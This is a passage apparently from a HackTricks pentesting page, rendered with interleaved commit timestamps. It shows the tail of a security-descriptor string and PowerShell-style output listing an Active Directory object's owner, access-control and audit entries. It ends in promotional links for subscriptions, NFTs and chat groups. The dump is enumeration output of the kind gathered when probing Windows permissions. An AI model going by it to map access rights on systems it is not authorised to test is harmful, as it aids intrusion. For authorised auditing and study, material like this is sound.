5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e5350144
Owner : BUILTIN\Administrators
Group : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
```
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-10-04 23:18:19 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-05-09 09:37:25 +00:00
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2022-12-31 17:21:45 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **and** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >